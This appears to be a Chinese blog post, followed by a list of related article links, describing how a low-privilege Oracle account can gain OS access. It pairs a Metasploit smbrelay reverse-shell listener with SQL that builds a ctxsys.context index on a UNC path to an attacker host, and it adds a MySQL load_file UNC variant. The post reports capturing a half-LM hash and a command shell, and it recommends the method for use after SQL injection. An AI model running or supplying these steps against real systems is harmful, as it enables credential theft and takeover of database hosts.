Oracle 低权限数据库账户得到 OS 访问权限 提权利用
这几天看了篇叫"Penetration: from application down to OS (Oracle)"的文档,感觉挺有意思的,文档的 大概意思就是说,如果 ORACLE 服务是用 administrator 账户启动的,你只要有一个具有 resource 和 connect 权限的数据库账户,就能利用 metasploit 的 smbrelay 功能,本地搭建一个 SMB 欺骗服务器, 来得到系统的访问权限。我本地测试了下,还真的成功了。:-)
具体的原理分析看原文吧,我这里把我的测试过程写出来.
我的渗透环境用的是 ubuntu8.10+metasploit 3.3 dev,oracle 数据库版本为 10.2.0.1.0,服务启动权限为 administrator,数据库账户用的是 dbsnmp 账户的默认权限.
1.先用 netstat 命令查看一下,本地的 139 端口有没有占用,一般占用此端口的服务就是 Samba 了,要关掉。ubuntu 的关闭方法是 sudo /etc/init.d/samba stop<p>
2.运行 metasploit,我选用的 PAYLOAD 是 shell_reverse_tcp,做好相应配置后,exploit.就能用 netstat 看到本地已经监听了 139 和 8522 端口了.
3.我现在使用 dbsnmp 默认账户连接到 oracle 数据库上,这个账户默认权限是比较低的,只有 connect和 resource 权限。
4.然后执行下面 3 条 SQL 语句
SQL> CREATE TABLE files(id NUMBER PRIMARY KEY,path VARCHAR(255) UNIQUE,ot_format VARCHAR(6)); SQL> INSERT INTO files VALUES(1,'\\192.168.1.52\mickey',NULL); SQL> CREATE INDEX file_index ON files(path) INDEXTYPE IS ctxsys.context 2 PARAMETERS('datastore ctxsys.file_datastore format column ot_format');
后来经过 pt007 的提醒,我又测试了 mysql,如果服务也是 administrator 启动的,用select load_file('\\\\192.168.1.52\mk.txt')也是可以得到系统权限的.MSSQL 应该用 xp_dirtree 存储过程 也是可以的,不过我没有配置出来用 administrator 账户启动 MSSQL 服务,希望知道的朋友指点下我。
这个技术可以用到内网 WEB 评估的时候,如果有注入,服务又是 administrator 启动的,可以提权了。
两个PDF下载,
作者:Mickey
http://dsecrg.com/files/pub/pdf/Penetration_from_application_down_to_OS_(Oracle%20database).pdf
http://54mickey.googlepages.com/Penetration_fromapplication_down_to_.pdf
当执行完 create index 这句的时候,在看咱们本地的 metasploit,就已经得到 ORACLE 数据库主机的系 统当前服务用户的 half lm 哈希和 cmdshell 了。
您可能感兴趣的文章:
- Javascript中的几种继承方式对比分析
- 浅析2种JavaScript继承方式
- Javascript编程中几种继承方式比较分析
- JavaScript中的继承方式详解
- javascript学习笔记(九)javascript中的原型(prototype)及原型链的继承方式
- JavaScript继承方式实例
- Linux下SVN服务器同时支持Apache的http和svnserve独立服务器两种模式且使用相同的访问权限账号
- 深入解析yii权限分级式访问控制的实现(非RBAC法)
- Oracle 10g各个帐号的访问权限、登录路径、监控状态命令查询等等
- 127.0.0.1无法访问,没有权限: GetObject
- 使用Cacls命令设置服务器文件访问权限
- C++ 的三种访问权限与三种继承方式
- 使用低权限 Oracle 数据库账户得到 OS 访问权限
- 使用低权限 Oracle 数据库账户得到 OS 访问权限
- 低权限 Oracle 数据库账户得到 OS 访问权限
- 使用低权限Oracle数据库账户得到OS访问权限
- 利用PLSQL访问远程服务器数据库oracle
- 安装mysq 在linux,以及配置权限, 让某个账户能远程访问并且访问所有数据库
- 利用PLSQL访问远程服务器数据库oracle
- oracle用户权限问题造成访问数据库出错
- Oracle GoldenGate 安全性配置系列:利用 CMDSEC 文件控制 GoldenGate 命令的用户访问权限
- SqlServer:使用普通账户登录win7系统时,无法访问.net软件,原因是sql server 数据库拒绝访问,提示user没有权限
- [oralce] 利用CRT的端口转发功能直接用plsql访问数据库
- 执行数据库维护计划时,有服务器访问权限问题
- oracle 11g登陆scott用户时出现应用程序要求的数据库权限超出了您当前具有的权限
- 数据库分页大全(oracle利用解析函数row_number高效分页)
- 面向程序员的数据库访问性能优化法则——面向oracle 也有部分适用于其它数据库产品
- Oracle--DBLink 进行数据库之间对象的访问操作
- 如何创建只读权限oracle账户-同义词
- 利用Aapache设置访问目录权限
- 利用ZTree链接数据库实现 [权限管理]